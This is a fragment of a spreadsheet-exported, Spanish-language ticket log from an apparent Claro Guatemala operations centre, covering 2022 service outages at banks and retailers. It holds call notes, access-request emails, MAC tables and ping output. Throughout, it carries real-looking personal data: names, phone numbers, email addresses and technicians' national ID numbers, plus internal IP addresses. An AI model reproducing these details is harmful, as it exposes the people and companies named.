ESTIMADO CLIENTE CON RESPECTO DEL E1
GDN: 22164650
BANCO INTERNACIONAL, S.A.
8200188T
RUTA 8 3-29 Z.4 C.C. MEGA TERMINAL LOCALES 3 Y 4
SE ESTA PERCIBIENDO QUE EN EL PUERTO DONDE TIENE QUE SUBIR SOLO LA MAC DEL EQUIPO TPLINK QUE UTILIZA PARA CONECTAR SU PBX HACIA LA RED DE CLARO, ESTAN SUBIENDO OTRAS MAC DE DISTINTOS EQUIPOS:
SE VALIDA QUE SUBEN VARIAS MAC PROVENIENTES EN EL PUERTO LAN
3720  00-80-9F-9E-B7-5B 3    DYNAMIC ALE INTERNATIONAL
3720  64-70-02-79-5E-18 3    DYNAMIC TP-LINK TECHNOLOGIES CO.,LTD.
3720  C0-56-E3-51-35-F2 3    DYNAMIC HANGZHOU HIKVISION DIGITAL TECHNOLOGY CO.,LTD.
3720  D4-76-A0-0D-55-7D 3    DYNAMIC FORTINET, INC
3720  E8-ED-D6-61-CC-72 3    DYNAMIC FORTINET, INC.
SOLICITAMOS PUEDAN VALIDAR SI EL PUERTO 3 DEL EQUIPO ETX-1 QUE CLARO LES DEJO EN SUS INSTALACIONES ESTA CONECTADO DIRECTO A SU EQUIPO TPLINK O PASA POR ALGUN SW QUE ESTE SUBIENDO ESTAS MAC QUE NO PERTENECEN, TAMBIEN SOLICITAMOS PUEDAN APLICAR UN REINCIO DEL EQUIPO TP LINK Y  DE LA PBX. ADEMÁS  SOLICITAMOS SU APOYO CONFIRMÁNDONOS SI POSEEN LAS CREDENCIALES DE ESTE SERVICIO (USUARIO Y CONTRASEÑA) QUE  CLARO LES BRINDO PARA UNA POSIBLE CERTIFICACIÓN.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE OSCAR TORRES-58656684 ## SE LE COMENTA QUE ESTAN SUBIERNDO VARIAS MAC AL EQUIPO, PERO NO LA DE PBX MARCA ALCATEL OMINIPCX - CLIENTE NOS INDICA QUE LO UICO QUE  TIENE CONECTADO AL TPLINK ES LA PBX-  CLIENTE PIDE SE LE ENVIE CORREO PARA EL VERIFICAR A NIVEL INTERNO SUS EQUIPOS ##VIVO
 OTORRES@INTERBANCO.COM.GT</t>
  </si>
  <si>
    <t>CLIENTE APLICARA RESET A SU PBX YA QUE NO SE ESTA REGISTRANDO ##LO MANTENEMOS EN LINEA ##</t>
  </si>
  <si>
    <t>CLIENTE OSCAR TORRES  NO RESPONDE, ESTA SUBIENDO MAS DE UNA MAC EN EL PUERTO DEL ETX-1
3720  00-80-9F-9E-B7-5B 3    DYNAMIC ALE INTERNATIONAL
3720  64-70-02-79-5E-18 3    DYNAMIC TP-LINK TECHNOLOGIES CO.,LTD.
3720  C0-56-E3-51-35-F2 3    DYNAMIC HANGZHOU HIKVISION DIGITAL TECHNOLOGY CO.,LTD.
3720  D4-76-A0-0D-55-7D 3    DYNAMIC FORTINET, INC
3720  E8-ED-D6-61-CC-72 3    DYNAMIC FORTINET, INC.
SE DEBE SOLICITAR AL CLIENTE PUEDAN VALIDAR CONEXIONES INTERNAS.
2001021213
COLA:
NOMBRE: A: 48656684
NÚMERO: 55280199
DURACIÓN: 0:00:09
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 12/05/2022 12:58:01
2001021296
COLA:
NOMBRE: A: 48656684
NÚMERO: 55280199
DURACIÓN: 0:00:08
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 12/05/2022 12:58:06</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE OSCAR TORRES-48656684</t>
  </si>
  <si>
    <t>SE HA LLAMADO A ANA CRSITINA ALVAREZ- 22275800  EXT   4867 ##2 VECES- ##NO CONTESTAN ##VIVO ##SE INTENTARA NUEVAMENTE EN BREVE</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR TORRES-58656684  ##VIVO
BANCO_INTERNACIONAL# SHOW CONFIGURE PORT SUMMARY
PORT           NUMBER         NAME            ADMIN    OPER      SPEED
-----------------------------------------------------------------------------
ETHERNET       1              ETH-1           UP       UP        100000000
ETHERNET       2              ETH-2           DOWN     DOWN      100000000
ETHERNET       3              ETH-3           UP       DOWN      100000000
ETHERNET       4              ETH-4           DOWN     DOWN      100000000
ETHERNET       5              ETH-5           DOWN     DOWN      100000000
ETHERNET       6              ETH-6           DOWN     DOWN      100000000
ETHERNET       101            MNG-ETH         UP       DOWN      100000000</t>
  </si>
  <si>
    <t>SE LLLAMA A CLIENTE OSCAR TORRES-58656684  || SE LE INDICA QUE SE HA CERTIFICADO SERVICIO, CLIENTE  ANA CRSITINA ALVAREZ- ESTUVO PRESENTE EN CERTIFICACION- Y CLIENTE  OSCAR TORRES-58656684 PROCEDE A ESCALAR CON SU SOPORTE ##SE PROCEDE AL CIERRE ##VIVO</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE  OSCAR TORRES-58656684 EN LINEA- ## NOS COMENTA QUE AHORITACOMPARTIRA LAS CREDENCIALES PARA REALIZAR CERTIFICACION ##</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANA CRSITINA ALVAREZ- 22275800  EXT:  4867 RESPONDE YENIFER MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001949108</t>
  </si>
  <si>
    <t>SERVICI SE HA  CERTIFICADO EL SERVICIO, SE HA DEMOSTRADO QUE HAY LLAMADAS ENTRANTES Y SALIENTES- CLIENTE DEBE VERIFICAR A NIVEL INTERNO ##CLIENTE  ANA CRSITINA ALVAREZ- ESTUVO PRESENTE EN CERTIFICACION ##SE DA CODIGO DE CIERE ##VIVO</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE YENIFER EN LINEA- NOS COMENTA QUE LA PBX ESTA TOTALMETE MUERTA- Y NOS BRIDA SU NUMERO CELULAR, PARA PODER IR A DONDE ESTAN LOS EQUIPOS YENNIFER-35423541 ##</t>
  </si>
  <si>
    <t>SE HA LLMADO A LA CENTRAL DEL BANCO, CON CLIENTE OSCAR TORRES-58656684 Y SE LE COMENTA QUE NO OBSERVAMOS LA PBX CONECTADA + QUE CLIENTE ENPR APLICO RESET PERO SOLO REGRESO EL SERVCIO A NIVEL INTERNO ##CLIENTE PIDE SE LE MARQUE EN 1 HORA ##VIVO</t>
  </si>
  <si>
    <t>EN PR SE APLICA RESET A PBX Y  SERVICIO SOLO ENTRE EXTENSIONES REGRESA- SE SIGUE SIN OBSERVAR LA PBX-
BANCO_INTERNACIONAL# SHOW CONFIGURE PORT SUMMARY
PORT           NUMBER         NAME            ADMIN    OPER      SPEED
-----------------------------------------------------------------------------
ETHERNET       1              ETH-1           UP       UP        100000000
ETHERNET       2              ETH-2           DOWN     DOWN      100000000
ETHERNET       3              ETH-3           UP       DOWN      100000000
ETHERNET       4              ETH-4           DOWN     DOWN      100000000
ETHERNET       5              ETH-5           DOWN     DOWN      100000000
ETHERNET       6              ETH-6           DOWN     DOWN      100000000
ETHERNET       101            MNG-ETH         UP       DOWN      100000000
BANCO_INTERNACIONAL#
BANCO_INTERNACIONAL#</t>
  </si>
  <si>
    <t>F4560465</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE IVON AGUILAR 61351508, CLIENTE COMENTA QUE TIENEN DAÑADA SU PLANTA PBX POR LO QUE SOLICITA UN DESVÍO DEL 26224500 HACIA EL NÚMERO CLARO 78594238. ID DE LLAMADA: 1001974949</t>
  </si>
  <si>
    <t>F4560467</t>
  </si>
  <si>
    <t>-* SE VALIDA QUE AUN NO SE TIENE RESPUESTA DE CLIENTE, SE ENVÍA NUEVAMENTE CORREO Y CONTINUAMOS A LA ESPERA -*
*RE: REPORTANDO | VISA * GUATEMALA * VISA-GTM-GUA-000004 * CID 3901406 * FLAPPING * INC000003725510 * SEV 3</t>
  </si>
  <si>
    <t>SE TERMINA LLAMADA CON EL CLIETE EDUARDO TOMAS QUIEN ME DICE QUE VA EN CAMINO A LA OFICINA, PERO QUE SE ENVIE CORREO TELEMATICAGT@BACCREDOMATIC.GT PARA QUE ME APOYEN CON LA SOLICITUD.
1001958372
COLA:
NOMBRE: A: 55111669
NÚMERO: 55111669
DURACIÓN: 0:03:22
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 55111669
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 12/05/2022 10:15:34</t>
  </si>
  <si>
    <t>**SE ENVIA CORREO A CLIENTE PARA EL TRAMITE DE ACCESOS**
DE: VERONICA RAQUEL VASQUEZ CORTEZ
ENVIADO: JUEVES, 12 DE MAYO DE 2022 13:51
PARA: TELEMATICAGT@BACCREDOMATIC.GT &lt;TELEMATICAGT@BACCREDOMATIC.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS ||CC_BAC_GT_AV_PETAPA_Z12_INTERNET ||ID: 8600197T||
**</t>
  </si>
  <si>
    <t>F4560551</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL TREJO 25562880 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001926729</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIGUEL TREJO AL 2556-2880 CLIENTE NO RESPONDE PARA CONFIRMAR ACCESOS YA QUE AUN ESTAMOS A ESPERA DE QUE RESPONDA EL CORREO**
ID 2001999349
**</t>
  </si>
  <si>
    <t>*SE LLAMA A CLIENTE MIGUEL TREJO AL 2556-2880 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001077303
**</t>
  </si>
  <si>
    <t>*SE LLAMA A CLIENTE MIGUEL TREJO AL 2556-2880 CONTESTA EL SEÑOR MELVIN ESTRADA INDICA QUE VA DE CAMINO QUE SE LE LLAME EN 1 HR **
ID 3001061048
**</t>
  </si>
  <si>
    <t>*SE LLAMA A CLIENTE MIGUEL TREJO AL 2556-2880 NO RESPONDE, SE INTENTARA LUEGO PARA CONFIRMAR PERMISOS* *
ID 3001057040
**</t>
  </si>
  <si>
    <t>*SE LLAMA A CLIENTE  MELVIN ESTRADA AL 2556-2880 INDICA QUE SE PROGRAME PARA HOY LA VISITA A LAS 14 HRS QUE YA ESTAN LOS ACCESOS PERO SIN FALTA POR FAVOR INDICA CLIENTE || SE NOTIFICA A GESTOR   **
ID 3001087729
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIGUEL TREJO AL 2556-2880 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001070179
**</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A DAVIVIENDA SOLICITANDO ACCESOS PARA TECNICOS || PENDIENTE CONFIRMEN
ERITO FERNANDO TECU XITUMUL
DOM 15/05/2022 09:19
ASUNTO: VISITA TÉCNICA IP2383062SV || BANCO DAVIVIENDA SALVADOREÑO S.A. || UBICACIÓN: SITIO DEL NIÑO
BUENA TARDE ESTIMADOS DAVIVIENDA.
EN SEGUIMIENTO AL SERVICIO REPORTADO IP2383062SV || BANCO DAVIVIENDA SALVADOREÑO S.A. || UBICACIÓN: SITIO DEL NIÑO.
LE COMENTO QUE NUESTRO PERSONAL TÉCNICO DESCARTÓ PROBLEMAS EN NUESTRA CENTRAL, POR LO QUE SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR UNA VISITA EN CONJUNTO PARA VERIFICAR MEDIO Y EQUIPOS DENTRO DE ATM. QUEDAMOS ATENTOS A QUE NOS PUEDAN BRINDAR UNA FECHA Y HORA PARA PROCEDER.
ADJUNTO LOS DATOS DEL PERSONAL TÉCNICO ASIGNADO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 2556-2880 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001184285</t>
  </si>
  <si>
    <t>SE ENVIA NUEVAMENTE CORREO AL CLIENTE SOLICITANDO LOS ACCESOS
DE: JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;
ENVIADO: MARTES, 17 DE MAYO DE 2022 12:03
PARA: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; ELSALVADOR_ITTCASOS@DAVIVIVIENDA.COM.SV &lt;ELSALVADOR_ITTCASOS@DAVIVIVIENDA.COM.SV&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: VISITA TÉCNICA IP2383062SV || BANCO DAVIVIENDA SALVADOREÑO S.A. || UBICACIÓN: SITIO DEL NIÑO
BUENA TARDE ESTIMADOS DAVIVIENDA.
EN SEGUIMIENTO AL SERVICIO REPORTADO IP2383062SV || BANCO DAVIVIENDA SALVADOREÑO S.A. || UBICACIÓN: SITIO DEL NIÑO.
LE COMENTO QUE NUESTRO PERSONAL TÉCNICO DESCARTÓ PROBLEMAS EN NUESTRA CENTRAL, POR LO QUE SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR UNA VISITA EN CONJUNTO PARA VERIFICAR MEDIO Y EQUIPOS DENTRO DE ATM. QUEDAMOS ATENTOS A QUE NOS PUEDAN BRINDAR UNA FECHA Y HORA PARA PROCEDER.
ADJUNTO LOS DATOS DEL PERSONAL TÉCNICO ASIGNADO.
CUI                    IBM     NOMBRE
03245714-4    8787 ADAN ERNESTO GONZALEZ
01320096-0    9401 OSCAR RENE VIDES
QUEDAMOS ATENTOS A SU RESPUESTA.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA LA SEÑORITA GUADALUPE SANCHEZ INDICA QUE EL DIA DE HOY TENDRAN UN MEET A LAS 3 PM Y LUEGO NOS ESTARAN CONFIRMANDO **
ID 1001913264
**</t>
  </si>
  <si>
    <t>F4560592</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIO  RUANO  41839684 INDICA QUE ANOCHE REGRESO EL SERVICIO PERO SI SE QUEDARON COMO 2:00 HRS SIN SERVICIO NO HUBO PROBLEMA DE ENERGIA INDICA QUE HOY NO LLEGA AL RESTAURANTE PERO QUE SE CONFIRME CON EL SEÑOR NESTOR AL 41005323 A LAS 15:00 HRS PARA SABER SI NO HA VUELTO A FALLAR**
ID 1001928965
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIO  RUANO   41839684 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001914415
**</t>
  </si>
  <si>
    <t>F4560609</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILMER CRUZ AL 71604055 INDICA QUE POR EL MOMENTO EL SERVICIO ESTA ESTABLE PERO SOLICITA QUE SE LE LLAME A LAS 17:30 HRS NUEVAMENTE PARA CONFIRMAR **
ID 1001986627
**</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE WILMER CRUZ 71604055 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001104449</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WELMER CRUZ AL 71604055  - 25135037 CONTESTA EN EL PRIMER NUMERO SE ESTABA EN LINEA PERO CL NO ESCUCHABA, SE INTENTA LLAMAR AL OTRO NUMERO PERO NO RESPONDE, SE INTENTARA LUEGO **
ID 1001926852- 1001928011
**</t>
  </si>
  <si>
    <t>F4560621</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA LA SEÑORITA GUADALUPE SANCHEZ INDICA QUE AUN NO TIENEN CONECTIVIDAD SOLICITA QUE SE LE ENVIEN PRUEBAS PARA ENVIARSELAS AL CLIENTE Y PUEDAN VERIFICAR EQUIPOS || SE NOTIFICA A GESTOR **
ID 1001913264
**</t>
  </si>
  <si>
    <t>F4560638</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO,  // QUEDAMOS A LA ESPERA DE LA RESPUESTA POR PARTE DE CLIENTE
BUEN DÍA ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN EL SITIO.
DIRECCIÓN:  KM. 20.5 CARRETERA A EL SALVADOR C.A.E.S. PRICESMART
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS.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S COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>F4560660</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GUSTABO GANUZA AL 79551067 QUIEN SOLICITA QUE SE LE COMPARTA UNA TABLA DE ARP COMPLETA DONDE SE VEA LA IP LAN DEL SERVICIO LA CAUSA SI TIENE UN CORTE DE FIBRA O EQUIPO ESTA APAGADO SOLICITA QUE SE LE ENVIE POR CORREO LA INFORMACION || SE NOTIFICA A GESTOR **
ID 1001923934 - 1001924719
**</t>
  </si>
  <si>
    <t>SE REALIZA CONFERENCIA CON CLIENTE GUSTAVO GANUZA DE Y GERARDO LARA DEL TICKET F4560679, YA QUE CLARO PRESTA SERVICIO L2, PARA VALIDAR DIRECCIONAMIENTO IP,
DESTINO 10.203.5.34/29  EN PUNTO REMOTO GUATEMALA Y  ORIGEN 10.203.5.33/29 EN EL SALVADOR YA QUE ESTOS NO LOGRAN ESTABLECER COMUNICACION DE PING. SE VALIDARAN PRUEBAS POR DIRECCIONAMIENTO MAC CON CLIENTE MENCIONA QUE PUEDE REALIZAR PRUEBAS A PARTIR DE LAS 2:30 HORAS EN CONJUNTO CON GERARDO LARA  DEL TICKET F4560679 Y PERSONAL DE CLARO.
NÚMERO:
INICIO: HOY, 12:20
ID DE LLAMADA: 2001008213</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 15:26
PARA: GANUZA MONJARAS, JOSE GUSTAVO &lt;JGANUZA@BI.COM.SV&gt;; GERARDO ALEJANDRO LARA RECINOS &lt;GLARA@BI.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; HERNANDEZ ALVARENGA, SANDRA LISSETTE &lt;SHERNANDEZ@BI.COM.SV&gt;
ASUNTO: RE: BANCO INDUSTRIAL EL SALVADOR S.A. | MP222801025SSV | SD1124936 || TELECOMUNICACIONES DE GUATEMALA, S.A | ID 99900289T | SD1124940
++GERARDO LARA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 15:25
PARA: GANUZA MONJARAS, JOSE GUSTAVO &lt;JGANUZA@BI.COM.SV&gt;; GERARDO ALEJANDRO LARA RECINOS &lt;GLARA@BI.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; HERNANDEZ ALVARENGA, SANDRA LISSETTE &lt;SHERNANDEZ@BI.COM.SV&gt;
ASUNTO: RE: BANCO INDUSTRIAL EL SALVADOR S.A. | MP222801025SSV | SD1124936 || TELECOMUNICACIONES DE GUATEMALA, S.A | ID 99900289T | SD1124940
BUENA TARDE, ESTIMADOS.
++SE AÑADE EN COLA A GERARDO LARA DE TELECOMUNICACIONES DE GUATEMALA, S.A. CON ID 99900289T, INCIDENTE SD1124940
SEGÚN LO CONVERSADO EN CONFERENCIA VÍA TELEFÓNICA,  SE REQUIERE REALIZAR PRUEBAS EN LOS DOS PUNTOS, ID99900289T Y MP222801025SSV, CONECTÁNDOSE DIRECTAMENTE AL ROUTER DE CLARO POR LO QUE SERÁ NECESARIO COORDINARLO.
QUEDAMOS A LA ESPERA DE LA PROGRAMACIÓN Y COMENTARIOS,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4560667</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO PEREZ AL 36571015 INDICA QUE NO HA LLEGADO A LA FISCALIA SOLICITA QUE SE LE LLAME EN 15 MIN NUEVAMENTE **
ID 1001915033
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO PEREZ AL 36571015 INDICA QUE YA SE ENCUENTRA EN LA FISCALIA QUE YA REINICIARON EQUIPOS PERO NO LEVANTA || SE TRATA DE LOCALIZAR A GESTOR PERO SE ENCUENTRA EN OTRA LLAMADA ||SE LE INDICA  A CL QUE SE LE DEVOLVERA LLAMADA NUEVAMENTE CL AGRADECE, Y SE NOTIFICA A GESTOR **
ID 1001918737
**</t>
  </si>
  <si>
    <t>F4560679</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 10:38
PARA: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;; GERARDO ALEJANDRO LARA RECINOS &lt;GLARA@BI.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; COMUNICACIONESLAN@BI.COM.GT &lt;COMUNICACIONESLAN@BI.COM.GT&gt;
ASUNTO: RE: TELECOMUNICACIONES DE GUATEMALA, S.A. | 99900289T | SD1124940
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE REALIZA CONFERENCIA CON CLIENTE GERARDO LARA  Y  GUSTAVO GANUZA  DEL TICKET F4560660, YA QUE CLARO PRESTA SERVICIO L2, PARA REALIZAR PRUEBAS CONECTANDOSE DIRECTAMENTE AL EQUIPO DE CLARO, PERO MENCIONA QUE SE COORDINARAN PARA REALIZARLA MAS ADELANTE, Y QUE SE LES ENVIE CORREO CON LA INFORMACION, ADICIONAL AGREGAR A LA COLA DE CORREO DEL PRESENTE CASO A GERARDO LARA DEL TICKET F4560660.
NÚMERO:
INICIO: HOY, 15:01
ID DE LLAMADA: 2001059483</t>
  </si>
  <si>
    <t>SE REALIZA CONFERENCIA CON CLIENTE GERARDO LARA  Y  GUSTAVO GANUZA  DEL TICKET F4560660, YA QUE CLARO PRESTA SERVICIO L2, PARA VALIDAR DIRECCIONAMIENTO IP,
DESTINO 10.203.5.34/29  EN PUNTO REMOTO GUATEMALA Y  ORIGEN 10.203.5.33/29 EN EL SALVADOR YA QUE ESTOS NO LOGRAN ESTABLECER COMUNICACION DE PING. SE VALIDARAN PRUEBAS POR DIRECCIONAMIENTO MAC CON CLIENTE MENCIONA QUE PUEDE REALIZAR PRUEBAS A PARTIR DE LAS 2:30 HORAS EN CONJUNTO CON GUSTAVO GANUZA ,  DEL TICKETF4560660 Y PERSONAL DE CLARO.
NÚMERO:
INICIO: HOY, 12:20
ID DE LLAMADA: 2001008213</t>
  </si>
  <si>
    <t>-*- GERARDO LARA 41438250 (CLIENTE) NO RESPONDE, SE VALIDA INFORMACION EN CRONOS ANTERIORES Y NO ESTAMOS AGREGADOS EN LA COLA DE CORREO, SE SOLICITA APOYO A CNOC -*
-*
ID DE LLAMADA: 2001114829
2001114915</t>
  </si>
  <si>
    <t>*/*/*/SE COMUNICA EL CLIENTE GERARDO LARA PARA SOLICITAR AVANCES, SE VALIDA QUE SERVICIO ESTA OK SEGÚN CRONOLOGIA DE CNOC DEL 11/05/2022 21:41:49, CLIENTE INDICA QUE AUN ESTA CAIDO, SE CONTACTA A GESTOR Y SE DEJA EN CONFERENCIA*/*/*/</t>
  </si>
  <si>
    <t xml:space="preserve"> SE RECIBE CORREO SE PROCEDE A BUSCAR INFORMACION SOLICITADA
DE: GERARDO ALEJANDRO LARA RECINOS &lt;GLARA@BI.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 9:28
PARA: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; COMUNICACIONESLAN@BI.COM.GT &lt;COMUNICACIONESLAN@BI.COM.GT&gt;
ASUNTO: RE: TELECOMUNICACIONES DE GUATEMALA, S.A. | 99900289T | SD1124940
BUEN DIA
ESAU
ME PUEDES MOSTRAR LA TABLA DE MAC ADDRESS Y LOS VECINOS POR FAVOR.
SALUDOS</t>
  </si>
  <si>
    <t>*SE LLAMA A CLIENTE GERARDO LARA AL 41438250 NO RESPONDE, SE INTENTARA LUEGO**
ID 1001917797
**</t>
  </si>
  <si>
    <t>SE COPIO A CC A LA COLA DE CORREOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BLANCA PINEDA 42191814  QUIEN APOYA EN VALIDAR LAS CONEXIONES DE LOS EQUIPOS, CLIENTE COMENTA QUE EL CABLE DE LA CORRIENTE ELECTRICA NO ESTABA BIEN CONECTADO, AYUDA EN CONECTAR BIEN EL EQUIPO Y EL SERVICIO RESTABLECE
-ID 1001955189
&lt;GNCYGTLON2D1D02A02EIM2&gt;PING -C 1000 -S 1000 -M 15 -BRIEF -VPN-INSTANCE  WALLMART 10.18.48.133
  PING 10.18.48.133: 1000  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.18.48.133 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/31 MS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FREDDY TARTON AL 48194114 - 42191814 EN EL PRIMER NUMERO NO RESPONDE Y EN EL SEGUNDO CONTESTA LA SEÑORA BLACA PINEDA Y SOLICITA QUE SE LE LLAME A LAS 10:00 AM YA QUE AHORITA NO SE ENCUENTRA **
ID 1001917009 - 1001917088
**
**</t>
  </si>
  <si>
    <t xml:space="preserve"> *** SE ENVÍA CORREO A CLIENTE SOLICITANDO AUTORIZACIÓN DE ACCESOS, A LA ESPERA DE CONFIRMACIÓN DE LOS MISMOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 12 DE MAYO DE 2022 7:36
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; VICTOR NUNEZ (VENDOR) &lt;VICTOR.NUNEZ2@WALMART.COM&gt;; ERICK ORELLANA (VENDOR) &lt;ERICK.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
